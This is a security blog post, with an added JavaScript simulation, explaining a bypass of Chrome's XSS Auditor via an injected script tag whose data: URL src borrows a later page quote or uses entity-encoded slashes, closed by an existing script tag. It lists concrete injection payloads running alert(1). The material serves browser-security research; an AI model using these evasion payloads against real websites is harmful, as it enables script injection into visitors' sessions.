Another XSS auditor bypass


This bug is similar to the last one I posted, but it executes in a different context. It requires an existing script after the injection point, because that script's closing tag is what closes the injected script. It's a shame Chrome doesn't support self-closing scripts in HTML or inside an SVG element, because I'm pretty sure I could bypass the auditor without relying on an existing script. Anyway, the injection uses a data URL that carries the script. To get past the filter we need to either concatenate the string with the quote from the attribute (so the attribute value runs on into the page's own markup instead of ending where the request says it does) or use HTML entities for characters such as //. Either way the script's src as the parser sees it no longer matches what was sent in the request. The HTML parser doesn't care how much junk sits between the opening and closing script tags, because we are using a src attribute: the inline content of a script element that has a src is ignored.
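The parsing behaviour the paragraph relies on, shown as an added example that is not code from the original post. It assumes a constructed vulnerable page template (a parameter reflected into text with a legitimate script further down), a small model of the HTML tokenizer and of data: URL fetching, and a deliberately simplified reflection-matching filter that blocks when the parsed script src appears verbatim in the request parameter; the real XSS Auditor's matching rules are not modelled, and every function name here is invented for the example.

```javascript
// Added example: how an unterminated quoted src, entity-encoded characters
// and a later pre-existing </script> change what the parser sees.
// All names, the page template and the filter model are constructed.

// Constructed vulnerable template: the parameter lands unescaped in text
// and a legitimate script follows it further down the page.
function reflect(param) {
  return (
    '<p>You searched for: ' + param + '</p>\n' +
    '<footer>built by <a href="/about">us</a></footer>\n' +
    '<script src="/app.js"></script>'
  );
}

// Decode numeric character references (&#47; &#x2f;) and a few named ones.
// Browsers decode far more; this is enough for attribute values here.
function decodeEntities(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (m, ref) => {
    if (ref[0] === '#') {
      const hex = ref[1].toLowerCase() === 'x';
      return String.fromCodePoint(parseInt(ref.slice(hex ? 2 : 1), hex ? 16 : 10));
    }
    return named[ref.toLowerCase()] ?? m;
  });
}

// Minimal model of the tokenizer for the first <script ...> start tag:
// a quoted attribute value runs to the next matching quote however far
// away, the tag ends at the first '>' outside quotes, and (src being
// present) everything up to the first "</script>" is inert script data.
function parseInjectedScript(html) {
  const start = html.search(/<script\b/i);
  if (start < 0) return null;
  let i = start + '<script'.length;
  const attrs = {};
  for (;;) {
    while (i < html.length && /\s/.test(html[i])) i++;
    if (i >= html.length) return null;          // tag never closed
    if (html[i] === '>') { i++; break; }
    if (html[i] === '/') { i++; continue; }
    let name = '';
    while (i < html.length && !/[\s=\/>]/.test(html[i])) name += html[i++];
    while (i < html.length && /\s/.test(html[i])) i++;
    let value = '';
    if (html[i] === '=') {
      i++;
      while (i < html.length && /\s/.test(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        const end = html.indexOf(q, i + 1);
        if (end < 0) return null;               // unterminated attribute
        value = html.slice(i + 1, end);
        i = end + 1;
      } else {
        while (i < html.length && !/[\s>]/.test(html[i])) value += html[i++];
      }
    }
    const key = name.toLowerCase();
    if (!(key in attrs)) attrs[key] = decodeEntities(value);
  }
  const close = html.slice(i).search(/<\/script>/i);
  return {
    src: attrs.src ?? null,
    body: close < 0 ? html.slice(i) : html.slice(i, i + close),
    closedByExistingTag: close >= 0,
  };
}

// Model of fetching a data: URL: the URL parser strips ASCII tab/newline
// (so page junk pulled into the URL stays on one line, inside the //
// comment), then the part after the first comma is percent-decoded.
function dataUrlBody(src) {
  const cleaned = src.replace(/[\t\n\r]/g, '');
  const comma = cleaned.indexOf(',');
  if (!/^data:/i.test(cleaned) || comma < 0) return null;
  try { return decodeURIComponent(cleaned.slice(comma + 1)); } catch { return null; }
}

// Run the script with a stand-in alert() that records its arguments.
function runScript(js) {
  const calls = [];
  new Function('alert', js)((...args) => calls.push(args));
  return calls;
}

// Simplified reflection-matching filter (an assumption for this example,
// not Chrome's logic): block when the parsed src appears in the request.
function reflectedFilterBlocks(param, src) {
  return src !== null && param.includes(src);
}

// Three constructed injections: a plain one the model filter catches,
// the borrowed-quote variant and the entity variant described above.
const INJECTIONS = {
  plain: '<script src="data:,alert(1)">',
  borrowedQuote: '<script src="data:,alert(1)//',
  entities: '<script src="data:,alert(1)&#47;&#47;">',
};

function analyse(param) {
  const parsed = parseInjectedScript(reflect(param));
  const src = parsed ? parsed.src : null;
  const blocked = reflectedFilterBlocks(param, src);
  const js = src === null ? null : dataUrlBody(src);
  return {
    src,
    closedByExistingTag: parsed ? parsed.closedByExistingTag : false,
    blocked,
    alerts: blocked || js === null ? [] : runScript(js),
  };
}

for (const [name, param] of Object.entries(INJECTIONS)) {
  console.log(name, JSON.stringify(analyse(param)));
}
```

In the borrowed-quote case the parsed src becomes `data:,alert(1)//</p>...<a href=`: the value is closed by the quote in the page's own `href="` attribute, the injected tag ends at the `>` of `/about">`, and the legitimate `<script src="/app.js">` start tag becomes inert junk inside the injected script's body until its `</script>` closes it. The appended junk is a JS line comment once the newlines are stripped by URL parsing, so `alert(1)` still runs, while the src no longer occurs in the request parameter.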

PoC
PoC2


Source: https://www.truth.cx/2015/02/19/another-xss-auditor-bypass/